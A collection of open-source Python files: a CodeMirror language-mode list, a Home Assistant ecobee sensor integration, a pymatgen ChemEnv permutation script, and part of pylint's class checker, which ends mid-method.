('haml', 'HAML', '/static/codemirror/mode/haml/haml.js'),
('handlebars', 'Handlebars', '/static/codemirror/mode/handlebars/handlebars.js'),
('haskell', 'Haskell', '/static/codemirror/mode/haskell/haskell.js'),
('haskell-literate', 'Haskell, Literate', '/static/codemirror/mode/haskell-literate/haskell-literate.js'),
('haxe', 'Haxe', '/static/codemirror/mode/haxe/haxe.js'),
('http', 'HTTP', '/static/codemirror/mode/http/http.js'),
('idl', 'IDL', '/static/codemirror/mode/idl/idl.js'),
('javascript', 'JavaScript', '/static/codemirror/mode/javascript/javascript.js'),
('jinja2', 'Jinja2', '/static/codemirror/mode/jinja2/jinja2.js'),
('jsx', 'JSX', '/static/codemirror/mode/jsx/jsx.js'),
('julia', 'Julia', '/static/codemirror/mode/julia/julia.js'),
('livescript', 'LiveScript', '/static/codemirror/mode/livescript/livescript.js'),
('lua', 'Lua', '/static/codemirror/mode/lua/lua.js'),
('markdown', 'Markdown', '/static/codemirror/mode/markdown/markdown.js'),
('mathematica', 'Mathematica', '/static/codemirror/mode/mathematica/mathematica.js'),
('mllike', 'F#', '/static/codemirror/mode/mllike/mllike.js'),
('mllike', 'OCaml', '/static/codemirror/mode/mllike/mllike.js'),
('modelica', 'Modelica', '/static/codemirror/mode/modelica/modelica.js'),
('nginx', 'Nginx', '/static/codemirror/mode/nginx/nginx.js'),
('nsis', 'NSIS', '/static/codemirror/mode/nsis/nsis.js'),
('ntriples', 'N-Triples/N-Quads', '/static/codemirror/mode/ntriples/ntriples.js'),
('octave', 'Octave', '/static/codemirror/mode/octave/octave.js'),
('oz', 'Oz', '/static/codemirror/mode/oz/oz.js'),
('pascal', 'Pascal', '/static/codemirror/mode/pascal/pascal.js'),
('pegjs', 'PEG.js', '/static/codemirror/mode/pegjs/pegjs.js'),
('perl', 'Perl', '/static/codemirror/mode/perl/perl.js'),
('php', 'PHP', '/static/codemirror/mode/php/php.js'),
('pig', 'Pig Latin', '/static/codemirror/mode/pig/pig.js'),
('plain-text', 'Plain text (no syntax highlighting)', ''),
('powershell', 'PowerShell', '/static/codemirror/mode/powershell/powershell.js'),
('protobuf', 'ProtoBuf', '/static/codemirror/mode/protobuf/protobuf.js'),
('pug', 'Pug', '/static/codemirror/mode/pug/pug.js'),
('puppet', 'Puppet', '/static/codemirror/mode/puppet/puppet.js'),
('python', 'Cython', '/static/codemirror/mode/python/python.js'),
('python', 'Python', '/static/codemirror/mode/python/python.js'),
('q', 'Q', '/static/codemirror/mode/q/q.js'),
('r', 'R', '/static/codemirror/mode/r/r.js'),
('rpm', 'RPM', '/static/codemirror/mode/rpm/rpm.js'),
('rst', 'reStructuredText', '/static/codemirror/mode/rst/rst.js'),
('ruby', 'Ruby', '/static/codemirror/mode/ruby/ruby.js'),
('rust', 'Rust', '/static/codemirror/mode/rust/rust.js'),
('sas', 'SAS', '/static/codemirror/mode/sas/sas.js'),
('sass', 'Sass', '/static/codemirror/mode/sass/sass.js'),
('scheme', 'Scheme', '/static/codemirror/mode/scheme/scheme.js'),
('shell', 'Shell', '/static/codemirror/mode/shell/shell.js'),
('sieve', 'Sieve', '/static/codemirror/mode/sieve/sieve.js'),
('slim', 'Slim', '/static/codemirror/mode/slim/slim.js'),
('smalltalk', 'Smalltalk', '/static/codemirror/mode/smalltalk/smalltalk.js'),
('smarty', 'Smarty', '/static/codemirror/mode/smarty/smarty.js'),
('solr', 'Solr', '/static/codemirror/mode/solr/solr.js'),
('soy', 'Soy', '/static/codemirror/mode/soy/soy.js'),
('sparql', 'SPARQL', '/static/codemirror/mode/sparql/sparql.js'),
('sql', 'SQL', '/static/codemirror/mode/sql/sql.js'),
('stex', 'sTeX, LaTeX', '/static/codemirror/mode/stex/stex.js'),
('stylus', 'Stylus', '/static/codemirror/mode/stylus/stylus.js'),
('swift', 'Swift', '/static/codemirror/mode/swift/swift.js'),
('tcl', 'Tcl', '/static/codemirror/mode/tcl/tcl.js'),
('textile', 'Textile', '/static/codemirror/mode/textile/textile.js'),
('tiddlywiki', 'Tiddlywiki', '/static/codemirror/mode/tiddlywiki/tiddlywiki.js'),
('tiki', 'Tiki wiki', '/static/codemirror/mode/tiki/tiki.js'),
('toml', 'TOML', '/static/codemirror/mode/toml/toml.js'),
('tornado', 'Tornado template', '/static/codemirror/mode/tornado/tornado.js'),
('troff', 'troff', '/static/codemirror/mode/troff/troff.js'),
('turtle', 'Turtle', '/static/codemirror/mode/turtle/turtle.js'),
('twig', 'Twig', '/static/codemirror/mode/twig/twig.js'),
('vb', 'VB.NET', '/static/codemirror/mode/vb/vb.js'),
('vbscript', 'VBScript', '/static/codemirror/mode/vbscript/vbscript.js'),
('velocity', 'Velocity', '/static/codemirror/mode/velocity/velocity.js'),
('verilog', 'Verilog/SystemVerilog', '/static/codemirror/mode/verilog/verilog.js'),
('vhdl', 'VHDL', '/static/codemirror/mode/vhdl/vhdl.js'),
('vue', 'Vue.js app', '/static/codemirror/mode/vue/vue.js'),
('webidl', 'Web IDL', '/static/codemirror/mode/webidl/webidl.js'),
('xml', 'XML/HTML', '/static/codemirror/mode/xml/xml.js'),
('xquery', 'XQuery', '/static/codemirror/mode/xquery/xquery.js'),
('yacas', 'Yacas', '/static/codemirror/mode/yacas/yacas.js'),
('yaml', 'YAML', '/static/codemirror/mode/yaml/yaml.js'),
('z80', 'Z80', '/static/codemirror/mode/z80/z80.js'),
]
HIGHLIGHT_SUBSTITUTIONS = {'clike': 'c', 'mllike': 'ocaml', 'stex': 'tex'}
|
sfu-fas/coursys
|
courselib/codemirror_language_list.py
|
Python
|
gpl-3.0
| 8,008
|
[
"CRYSTAL"
] |
275ab487ebfc73c8f6c63bd622834b5b32997add7226ea7150d8d968739e6fab
|
"""Support for Ecobee sensors."""
from pyecobee.const import ECOBEE_STATE_CALIBRATING, ECOBEE_STATE_UNKNOWN
from homeassistant.components.sensor import SensorEntity
from homeassistant.const import (
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
PERCENTAGE,
TEMP_FAHRENHEIT,
)
from .const import _LOGGER, DOMAIN, ECOBEE_MODEL_TO_NAME, MANUFACTURER
SENSOR_TYPES = {
"temperature": ["Temperature", TEMP_FAHRENHEIT],
"humidity": ["Humidity", PERCENTAGE],
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up ecobee (temperature and humidity) sensors."""
data = hass.data[DOMAIN]
dev = []
for index in range(len(data.ecobee.thermostats)):
for sensor in data.ecobee.get_remote_sensors(index):
for item in sensor["capability"]:
if item["type"] not in ("temperature", "humidity"):
continue
dev.append(EcobeeSensor(data, sensor["name"], item["type"], index))
async_add_entities(dev, True)
class EcobeeSensor(SensorEntity):
"""Representation of an Ecobee sensor."""
def __init__(self, data, sensor_name, sensor_type, sensor_index):
"""Initialize the sensor."""
self.data = data
self._name = f"{sensor_name} {SENSOR_TYPES[sensor_type][0]}"
self.sensor_name = sensor_name
self.type = sensor_type
self.index = sensor_index
self._state = None
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
@property
def name(self):
"""Return the name of the Ecobee sensor."""
return self._name
@property
def unique_id(self):
"""Return a unique identifier for this sensor."""
for sensor in self.data.ecobee.get_remote_sensors(self.index):
if sensor["name"] == self.sensor_name:
if "code" in sensor:
return f"{sensor['code']}-{self.device_class}"
thermostat = self.data.ecobee.get_thermostat(self.index)
return f"{thermostat['identifier']}-{sensor['id']}-{self.device_class}"
@property
def device_info(self):
"""Return device information for this sensor."""
identifier = None
model = None
for sensor in self.data.ecobee.get_remote_sensors(self.index):
if sensor["name"] != self.sensor_name:
continue
if "code" in sensor:
identifier = sensor["code"]
model = "ecobee Room Sensor"
else:
thermostat = self.data.ecobee.get_thermostat(self.index)
identifier = thermostat["identifier"]
try:
model = (
f"{ECOBEE_MODEL_TO_NAME[thermostat['modelNumber']]} Thermostat"
)
except KeyError:
_LOGGER.error(
"Model number for ecobee thermostat %s not recognized. "
"Please visit this link and provide the following information: "
"https://github.com/home-assistant/core/issues/27172 "
"Unrecognized model number: %s",
thermostat["name"],
thermostat["modelNumber"],
)
break
if identifier is not None and model is not None:
return {
"identifiers": {(DOMAIN, identifier)},
"name": self.sensor_name,
"manufacturer": MANUFACTURER,
"model": model,
}
return None
@property
def device_class(self):
"""Return the device class of the sensor."""
if self.type in (DEVICE_CLASS_HUMIDITY, DEVICE_CLASS_TEMPERATURE):
return self.type
return None
@property
def state(self):
"""Return the state of the sensor."""
if self._state in [
ECOBEE_STATE_CALIBRATING,
ECOBEE_STATE_UNKNOWN,
"unknown",
]:
return None
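        # The ecobee API reports temperatures in tenths of a degree Fahrenheit.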
if self.type == "temperature":
return float(self._state) / 10
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement this sensor expresses itself in."""
return self._unit_of_measurement
async def async_update(self):
"""Get the latest state of the sensor."""
await self.data.update()
for sensor in self.data.ecobee.get_remote_sensors(self.index):
if sensor["name"] != self.sensor_name:
continue
for item in sensor["capability"]:
if item["type"] != self.type:
continue
self._state = item["value"]
break
|
w1ll1am23/home-assistant
|
homeassistant/components/ecobee/sensor.py
|
Python
|
apache-2.0
| 4,823
|
[
"VisIt"
] |
284c6c041981ab5548577fa849674c3b2a8e1a506100fd2e89b6754abed0e9e9
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Development script of the ChemEnv utility to get the explicit permutations for coordination environments identified
with the separation plane algorithms (typically with coordination numbers >= 6)
"""
import itertools
import json
import numpy as np
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import (
AllCoordinationGeometries,
)
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import (
AbstractGeometry,
LocalGeometryFinder,
)
from pymatgen.analysis.chemenv.utils.coordination_geometry_utils import Plane, collinear
if __name__ == "__main__":
# Choose the geometry
allcg = AllCoordinationGeometries()
while True:
cg_symbol = input("Enter symbol of the geometry for which you want to get the explicit permutations : ")
try:
cg = allcg[cg_symbol]
break
except LookupError:
print("Wrong geometry, try again ...")
continue
# Check if the algorithm currently defined for this geometry corresponds to the explicit permutation algorithm
for algo in cg.algorithms:
if algo.algorithm_type != "SEPARATION_PLANE":
raise ValueError("WRONG ALGORITHM !")
newalgos = []
ialgo = 1
for sepplanealgo in cg._algorithms:
print(f"In ialgo = {ialgo:d}/{len(cg._algorithms):d}")
ialgo += 1
if sepplanealgo.algorithm_type != "SEPARATION_PLANE":
raise ValueError("Should all be separation plane")
permsonfile = f"Permutations on file in this algorithm ({len(sepplanealgo._permutations):d}) "
print(permsonfile)
print(sepplanealgo._permutations)
permutations = sepplanealgo.safe_separation_permutations(
ordered_plane=sepplanealgo.ordered_plane, ordered_point_groups=sepplanealgo.ordered_point_groups
)
sepplanealgo._permutations = permutations
print(f"Test permutations ({len(permutations):d}) :")
print(permutations)
lgf = LocalGeometryFinder()
lgf.setup_parameters(structure_refinement=lgf.STRUCTURE_REFINEMENT_NONE)
lgf.setup_test_perfect_environment(
cg_symbol, randomness=True, indices=range(cg.coordination_number), max_random_dist=0.05
)
lgf.perfect_geometry = AbstractGeometry.from_cg(cg=cg)
# Setting up the plane of separation
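        # Plane-selection strategy: try increasing numbers of plane points; with 2
        # points use the central site as the third, with 3 use them directly, and
        # with more than 3 do a least-squares fit. Collinear combinations are skipped.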
local_plane = None
found = False
for npoints in range(sepplanealgo.minimum_number_of_points, min(sepplanealgo.maximum_number_of_points, 4) + 1):
if found:
break
for ipoints in itertools.combinations(sepplanealgo.plane_points, npoints):
points_combination = [lgf.local_geometry.coords[ipoint] for ipoint in ipoints]
if npoints == 2:
if collinear(
points_combination[0], points_combination[1], lgf.local_geometry.central_site, tolerance=0.25
):
continue
local_plane = Plane.from_3points(
points_combination[0], points_combination[1], lgf.local_geometry.central_site
)
found = True
break
elif npoints == 3:
if collinear(points_combination[0], points_combination[1], points_combination[2], tolerance=0.25):
continue
local_plane = Plane.from_3points(
points_combination[0], points_combination[1], points_combination[2]
)
found = True
break
elif npoints > 3:
local_plane = Plane.from_npoints(points_combination, best_fit="least_square_distance")
found = True
break
else:
raise ValueError("Wrong number of points to initialize separation plane")
points_perfect = lgf.perfect_geometry.points_wocs_ctwocc()
# Actual test of the permutations
cgsm = lgf._cg_csm_separation_plane(
coordination_geometry=cg,
sepplane=sepplanealgo,
local_plane=local_plane,
plane_separations=[],
dist_tolerances=[0.05, 0.1, 0.2, 0.3],
testing=True,
points_perfect=points_perfect,
)
print(cgsm)
if cgsm[0] is None:
print("IS NONE !")
input()
continue
csms, perms, algos, sep_perms = cgsm[0], cgsm[1], cgsm[2], cgsm[3]
print("Continuous symmetry measures")
print(csms)
csms_with_recorded_permutation = []
explicit_permutations = []
for icsm, csm in enumerate(csms):
found = False
for csm2 in csms_with_recorded_permutation:
if np.isclose(csm, csm2, rtol=0.0, atol=1.0e-6):
found = True
break
if not found:
print(perms[icsm], csm)
csms_with_recorded_permutation.append(csm)
explicit_permutations.append(sep_perms[icsm])
print(permsonfile)
print(f"Permutations found ({len(explicit_permutations):d}) : ")
print(explicit_permutations)
sepplanealgo.explicit_permutations = explicit_permutations
newalgos.append(sepplanealgo)
    # Write updated geometry file?
test = input('Save it ? ("y" to confirm)')
if test == "y":
cg._algorithms = newalgos
cg_dict = cg.as_dict()
        with open(f"../coordination_geometries_files_new/{cg_symbol}.json", "w") as f:
            json.dump(cg_dict, f)
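        # Hypothetical sanity check: re-read the file we just wrote to make sure
        # it round-trips as valid JSON (no assumptions about its key names).
        with open(f"../coordination_geometries_files_new/{cg_symbol}.json") as fcheck:
            stored = json.load(fcheck)
        print(f"Re-read {cg_symbol}.json with {len(stored):d} top-level keys")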
|
materialsproject/pymatgen
|
dev_scripts/chemenv/explicit_permutations_plane_algorithm.py
|
Python
|
mit
| 5,857
|
[
"pymatgen"
] |
eaf54af0f2cf94387c12835917fbd9722fbf12f3dc6f25c9294906a4347a6040
|
# Copyright (c) 2003-2014 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""classes checker for Python code
"""
from __future__ import generators
import sys
from collections import defaultdict
import astroid
from astroid import YES, Instance, are_exclusive, AssAttr, Class
from astroid.bases import Generator, BUILTINS
from astroid.inference import InferenceContext
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers.utils import (
PYMETHODS, overrides_a_method, check_messages, is_attr_private,
is_attr_protected, node_frame_class, safe_infer, is_builtin_object,
decorated_with_property, unimplemented_abstract_methods)
import six
if sys.version_info >= (3, 0):
NEXT_METHOD = '__next__'
else:
NEXT_METHOD = 'next'
ITER_METHODS = ('__iter__', '__getitem__')
def _called_in_methods(func, klass, methods):
""" Check if the func was called in any of the given methods,
belonging to the *klass*. Returns True if so, False otherwise.
"""
if not isinstance(func, astroid.Function):
return False
for method in methods:
try:
infered = klass.getattr(method)
except astroid.NotFoundError:
continue
for infer_method in infered:
for callfunc in infer_method.nodes_of_class(astroid.CallFunc):
try:
bound = next(callfunc.func.infer())
except (astroid.InferenceError, StopIteration):
continue
if not isinstance(bound, astroid.BoundMethod):
continue
func_obj = bound._proxied
if isinstance(func_obj, astroid.UnboundMethod):
func_obj = func_obj._proxied
if func_obj.name == func.name:
return True
return False
def class_is_abstract(node):
"""return true if the given class node should be considered as an abstract
class
"""
for method in node.methods():
if method.parent.frame() is node:
if method.is_abstract(pass_is_abstract=False):
return True
return False
def _is_attribute_property(name, klass):
""" Check if the given attribute *name* is a property
in the given *klass*.
It will look for `property` calls or for functions
with the given name, decorated by `property` or `property`
subclasses.
Returns ``True`` if the name is a property in the given klass,
``False`` otherwise.
"""
try:
attributes = klass.getattr(name)
except astroid.NotFoundError:
return False
property_name = "{0}.property".format(BUILTINS)
for attr in attributes:
try:
infered = next(attr.infer())
except astroid.InferenceError:
continue
if (isinstance(infered, astroid.Function) and
decorated_with_property(infered)):
return True
if infered.pytype() == property_name:
return True
return False
MSGS = {
'F0202': ('Unable to check methods signature (%s / %s)',
'method-check-failed',
              'Used when Pylint has been unable to check methods signature \
              compatibility for an unexpected reason. Please report this kind \
              of issue if you can\'t make sense of it.'),
'E0202': ('An attribute defined in %s line %s hides this method',
'method-hidden',
'Used when a class defines a method which is hidden by an '
'instance attribute from an ancestor class or set by some '
'client code.'),
'E0203': ('Access to member %r before its definition line %s',
'access-member-before-definition',
'Used when an instance member is accessed before it\'s actually\
assigned.'),
'W0201': ('Attribute %r defined outside __init__',
'attribute-defined-outside-init',
'Used when an instance attribute is defined outside the __init__\
method.'),
'W0212': ('Access to a protected member %s of a client class', # E0214
'protected-access',
              'Used when a protected member (i.e. class member with a name \
              beginning with an underscore) is accessed outside the class or a \
              descendant of the class where it\'s defined.'),
'E0211': ('Method has no argument',
'no-method-argument',
'Used when a method which should have the bound instance as \
first argument has no argument defined.'),
'E0213': ('Method should have "self" as first argument',
'no-self-argument',
              'Used when a method has a first argument named differently\
              than "self". This is considered an error since it is such a\
              common convention that you shouldn\'t break it!'),
'C0202': ('Class method %s should have %s as first argument', # E0212
'bad-classmethod-argument',
'Used when a class method has a first argument named differently '
'than the value specified in valid-classmethod-first-arg option '
'(default to "cls"), recommended to easily differentiate them '
'from regular instance methods.'),
'C0203': ('Metaclass method %s should have %s as first argument', # E0214
'bad-mcs-method-argument',
              'Used when a metaclass method has a first argument named '
'differently than the value specified in valid-classmethod-first'
'-arg option (default to "cls"), recommended to easily '
'differentiate them from regular instance methods.'),
'C0204': ('Metaclass class method %s should have %s as first argument',
'bad-mcs-classmethod-argument',
'Used when a metaclass class method has a first argument named '
'differently than the value specified in valid-metaclass-'
'classmethod-first-arg option (default to "mcs"), recommended to '
'easily differentiate them from regular instance methods.'),
'W0211': ('Static method with %r as first argument',
'bad-staticmethod-argument',
'Used when a static method has "self" or a value specified in '
'valid-classmethod-first-arg option or '
'valid-metaclass-classmethod-first-arg option as first argument.'
),
'R0201': ('Method could be a function',
'no-self-use',
'Used when a method doesn\'t use its bound instance, and so could\
be written as a function.'
),
'E0221': ('Interface resolved to %s is not a class',
'interface-is-not-class',
'Used when a class claims to implement an interface which is not \
a class.'),
'E0222': ('Missing method %r from %s interface',
'missing-interface-method',
'Used when a method declared in an interface is missing from a \
class implementing this interface'),
'W0221': ('Arguments number differs from %s %r method',
'arguments-differ',
'Used when a method has a different number of arguments than in \
the implemented interface or in an overridden method.'),
'W0222': ('Signature differs from %s %r method',
'signature-differs',
'Used when a method signature is different than in the \
implemented interface or in an overridden method.'),
'W0223': ('Method %r is abstract in class %r but is not overridden',
'abstract-method',
'Used when an abstract method (i.e. raise NotImplementedError) is \
              not overridden in a concrete class.'
),
'F0220': ('failed to resolve interfaces implemented by %s (%s)', # W0224
'unresolved-interface',
              'Used when Pylint has failed to find interfaces implemented by \
              a class'),
'W0231': ('__init__ method from base class %r is not called',
'super-init-not-called',
              'Used when an ancestor class has an __init__ method \
which is not called by a derived class.'),
'W0232': ('Class has no __init__ method',
'no-init',
              'Used when a class has no __init__ method, and neither do its \
              parent classes.'),
'W0233': ('__init__ method from a non direct base class %r is called',
'non-parent-init-called',
'Used when an __init__ method is called on a class which is not \
in the direct ancestors for the analysed class.'),
'W0234': ('__iter__ returns non-iterator',
'non-iterator-returned',
'Used when an __iter__ method returns something which is not an \
              iterator (i.e. has no `%s` method)' % NEXT_METHOD),
'E0235': ('__exit__ must accept 3 arguments: type, value, traceback',
'bad-context-manager',
'Used when the __exit__ special method, belonging to a \
context manager, does not accept 3 arguments \
(type, value, traceback).'),
'E0236': ('Invalid object %r in __slots__, must contain '
'only non empty strings',
'invalid-slots-object',
'Used when an invalid (non-string) object occurs in __slots__.'),
'E0237': ('Assigning to attribute %r not defined in class slots',
'assigning-non-slot',
'Used when assigning to an attribute not defined '
'in the class slots.'),
'E0238': ('Invalid __slots__ object',
'invalid-slots',
'Used when an invalid __slots__ is found in class. '
'Only a string, an iterable or a sequence is permitted.'),
'E0239': ('Inheriting %r, which is not a class.',
'inherit-non-class',
'Used when a class inherits from something which is not a '
'class.'),
}
class ClassChecker(BaseChecker):
"""checks for :
* methods without self as first argument
* overridden methods signature
* access only to existent members via self
* attributes not defined in the __init__ method
* supported interfaces implementation
* unreachable code
"""
__implements__ = (IAstroidChecker,)
# configuration section name
name = 'classes'
# messages
msgs = MSGS
priority = -2
# configuration options
options = (('ignore-iface-methods',
{'default' : (#zope interface
'isImplementedBy', 'deferred', 'extends', 'names',
'namesAndDescriptions', 'queryDescriptionFor', 'getBases',
'getDescriptionFor', 'getDoc', 'getName', 'getTaggedValue',
'getTaggedValueTags', 'isEqualOrExtendedBy', 'setTaggedValue',
'isImplementedByInstancesOf',
# twisted
'adaptWith',
# logilab.common interface
'is_implemented_by'),
'type' : 'csv',
'metavar' : '<method names>',
'help' : 'List of interface methods to ignore, \
separated by a comma. This is used for instance to not check methods defined \
in Zope\'s Interface base class.'}
),
('defining-attr-methods',
{'default' : ('__init__', '__new__', 'setUp'),
'type' : 'csv',
'metavar' : '<method names>',
'help' : 'List of method names used to declare (i.e. assign) \
instance attributes.'}
),
('valid-classmethod-first-arg',
{'default' : ('cls',),
'type' : 'csv',
'metavar' : '<argument names>',
'help' : 'List of valid names for the first argument in \
a class method.'}
),
('valid-metaclass-classmethod-first-arg',
{'default' : ('mcs',),
'type' : 'csv',
'metavar' : '<argument names>',
'help' : 'List of valid names for the first argument in \
a metaclass class method.'}
),
('exclude-protected',
{
'default': (
# namedtuple public API.
'_asdict', '_fields', '_replace', '_source', '_make'),
'type': 'csv',
'metavar': '<protected access exclusions>',
'help': ('List of member names, which should be excluded '
'from the protected access warning.')}
))
def __init__(self, linter=None):
BaseChecker.__init__(self, linter)
self._accessed = []
self._first_attrs = []
self._meth_could_be_func = None
def visit_class(self, node):
"""init visit variable _accessed and check interfaces
"""
self._accessed.append(defaultdict(list))
self._check_bases_classes(node)
self._check_interfaces(node)
# if not an interface, exception, metaclass
if node.type == 'class':
try:
node.local_attr('__init__')
except astroid.NotFoundError:
self.add_message('no-init', args=node, node=node)
self._check_slots(node)
self._check_proper_bases(node)
@check_messages('inherit-non-class')
def _check_proper_bases(self, node):
"""
Detect that a class inherits something which is not
a class or a type.
"""
for base in node.bases:
ancestor = safe_infer(base)
if ancestor in (YES, None):
continue
if (isinstance(ancestor, astroid.Instance) and
ancestor.is_subtype_of('%s.type' % (BUILTINS,))):
continue
if not isinstance(ancestor, astroid.Class):
self.add_message('inherit-non-class',
args=base.as_string(), node=node)
@check_messages('access-member-before-definition',
'attribute-defined-outside-init')
def leave_class(self, cnode):
"""close a class node:
check that instance attributes are defined in __init__ and check
access to existent members
"""
# check access to existent members on non metaclass classes
accessed = self._accessed.pop()
if cnode.type != 'metaclass':
self._check_accessed_members(cnode, accessed)
# checks attributes are defined in an allowed method such as __init__
if not self.linter.is_message_enabled('attribute-defined-outside-init'):
return
defining_methods = self.config.defining_attr_methods
current_module = cnode.root()
for attr, nodes in six.iteritems(cnode.instance_attrs):
            # skip nodes which are not in the current module; they may screw up
            # the output and it's not worth it
nodes = [n for n in nodes if not
isinstance(n.statement(), (astroid.Delete, astroid.AugAssign))
and n.root() is current_module]
if not nodes:
continue # error detected by typechecking
            # check if any method in which attr is defined is a defining method
if any(node.frame().name in defining_methods
for node in nodes):
continue
# check attribute is defined in a parent's __init__
for parent in cnode.instance_attr_ancestors(attr):
attr_defined = False
                # check if any parent method in which attr is defined is a defining method
for node in parent.instance_attrs[attr]:
if node.frame().name in defining_methods:
attr_defined = True
if attr_defined:
# we're done :)
break
else:
# check attribute is defined as a class attribute
try:
cnode.local_attr(attr)
except astroid.NotFoundError:
for node in nodes:
if node.frame().name not in defining_methods:
# If the attribute was set by a callfunc in any
# of the defining methods, then don't emit
# the warning.
if _called_in_methods(node.frame(), cnode,
defining_methods):
continue
self.add_message('attribute-defined-outside-init',
args=attr, node=node)
def visit_function(self, node):
"""check method arguments, overriding"""
# ignore actual functions
if not node.is_method():
return
klass = node.parent.frame()
self._meth_could_be_func = True
# check first argument is self if this is actually a method
self._check_first_arg_for_type(node, klass.type == 'metaclass')
if node.name == '__init__':
self._check_init(node)
return
# check signature if the method overloads inherited method
for overridden in klass.local_attr_ancestors(node.name):
# get astroid for the searched method
try:
meth_node = overridden[node.name]
except KeyError:
# we have found the method but it's not in the local
# dictionary.
# This may happen with astroid build from living objects
continue
if not isinstance(meth_node, astroid.Function):
continue
self._check_signature(node, meth_node, 'overridden')
break
if node.decorators:
for decorator in node.decorators.nodes:
if isinstance(decorator, astroid.Getattr) and \
decorator.attrname in ('getter', 'setter', 'deleter'):
# attribute affectation will call this method, not hiding it
return
if isinstance(decorator, astroid.Name) and decorator.name == 'property':
# attribute affectation will either call a setter or raise
# an attribute error, anyway not hiding the function
return
# check if the method is hidden by an attribute
try:
overridden = klass.instance_attr(node.name)[0] # XXX
overridden_frame = overridden.frame()
if (isinstance(overridden_frame, astroid.Function)
and overridden_frame.type == 'method'):
overridden_frame = overridden_frame.parent.frame()
if (isinstance(overridden_frame, Class)
and klass.is_subtype_of(overridden_frame.qname())):
args = (overridden.root().name, overridden.fromlineno)
self.add_message('method-hidden', args=args, node=node)
except astroid.NotFoundError:
pass
# check non-iterators in __iter__
if node.name == '__iter__':
self._check_iter(node)
elif node.name == '__exit__':
self._check_exit(node)
def _check_slots(self, node):
if '__slots__' not in node.locals:
return
for slots in node.igetattr('__slots__'):
# check if __slots__ is a valid type
for meth in ITER_METHODS:
try:
slots.getattr(meth)
break
except astroid.NotFoundError:
continue
else:
self.add_message('invalid-slots', node=node)
continue
if isinstance(slots, astroid.Const):
# a string, ignore the following checks
continue
if not hasattr(slots, 'itered'):
# we can't obtain the values, maybe a .deque?
continue
if isinstance(slots, astroid.Dict):
values = [item[0] for item in slots.items]
else:
values = slots.itered()
if values is YES:
return
for elt in values:
try:
self._check_slots_elt(elt)
except astroid.InferenceError:
continue
def _check_slots_elt(self, elt):
for infered in elt.infer():
if infered is YES:
continue
if (not isinstance(infered, astroid.Const) or
not isinstance(infered.value, six.string_types)):
self.add_message('invalid-slots-object',
args=infered.as_string(),
node=elt)
continue
if not infered.value:
self.add_message('invalid-slots-object',
args=infered.as_string(),
node=elt)
def _check_iter(self, node):
try:
infered = node.infer_call_result(node)
except astroid.InferenceError:
return
for infered_node in infered:
if (infered_node is YES
or isinstance(infered_node, Generator)):
continue
if isinstance(infered_node, astroid.Instance):
try:
infered_node.local_attr(NEXT_METHOD)
except astroid.NotFoundError:
self.add_message('non-iterator-returned',
node=node)
break
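    # For reference, a compliant context manager defines the standard signature:
    #
    #     def __exit__(self, exc_type, exc_value, traceback): ...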
def _check_exit(self, node):
positional = sum(1 for arg in node.args.args if arg.name != 'self')
if positional < 3 and not node.args.vararg:
self.add_message('bad-context-manager',
node=node)
elif positional > 3:
self.add_message('bad-context-manager',
node=node)
def leave_function(self, node):
"""on method node, check if this method couldn't be a function
ignore class, static and abstract methods, initializer,
methods overridden from a parent class and any
kind of method defined in an interface for this warning
"""
if node.is_method():
if node.args.args is not None:
self._first_attrs.pop()
if not self.linter.is_message_enabled('no-self-use'):
return
class_node = node.parent.frame()
if (self._meth_could_be_func and node.type == 'method'
                and node.name not in PYMETHODS
and not (node.is_abstract() or
overrides_a_method(class_node, node.name))
and class_node.type != 'interface'):
self.add_message('no-self-use', node=node)
def visit_getattr(self, node):
"""check if the getattr is an access to a class member
if so, register it. Also check for access to protected
class member from outside its class (but ignore __special__
methods)
"""
attrname = node.attrname
# Check self
if self.is_first_attr(node):
self._accessed[-1][attrname].append(node)
return
if not self.linter.is_message_enabled('protected-access'):
return
self._check_protected_attribute_access(node)
def visit_assattr(self, node):
if isinstance(node.ass_type(), astroid.AugAssign) and self.is_first_attr(node):
self._accessed[-1][node.attrname].append(node)
self._check_in_slots(node)
def _check_in_slots(self, node):
""" Check that the given assattr node
is defined in the class slots.
"""
infered = safe_infer(node.expr)
if infered and isinstance(infered, Instance):
klass = infered._proxied
if '__slots__' not in klass.locals or not klass.newstyle:
return
slots = klass.slots()
if slots is None:
return
# If any ancestor doesn't use slots, the slots
# defined for this class are superfluous.
if any('__slots__' not in ancestor.locals and
ancestor.name != 'object'
for ancestor in klass.ancestors()):
return
if not any(slot.value == node.attrname for slot in slots):
# If we have a '__dict__' in slots, then
# assigning any name is valid.
if not any(slot.value == '__dict__' for slot in slots):
if _is_attribute_property(node.attrname, klass):
# Properties circumvent the slots mechanism,
# so we should not emit a warning for them.
return
self.add_message('assigning-non-slot',
args=(node.attrname, ), node=node)
@check_messages('protected-access')
def visit_assign(self, assign_node):
node = assign_node.targets[0]
if not isinstance(node, AssAttr):
return
if self.is_first_attr(node):
return
self._check_protected_attribute_access(node)
def _check_protected_attribute_access(self, node):
'''Given an attribute access node (set or get), check if attribute
access is legitimate. Call _check_first_attr with node before calling
this method. Valid cases are:
* self._attr in a method or cls._attr in a classmethod. Checked by
_check_first_attr.
* Klass._attr inside "Klass" class.
* Klass2._attr inside "Klass" class when Klass2 is a base class of
Klass.
'''
attrname = node.attrname
if (is_attr_protected(attrname) and
attrname not in self.config.exclude_protected):
klass = node_frame_class(node)
# XXX infer to be more safe and less dirty ??
# in classes, check we are not getting a parent method
# through the class object or through super
callee = node.expr.as_string()
# We are not in a class, no remaining valid case
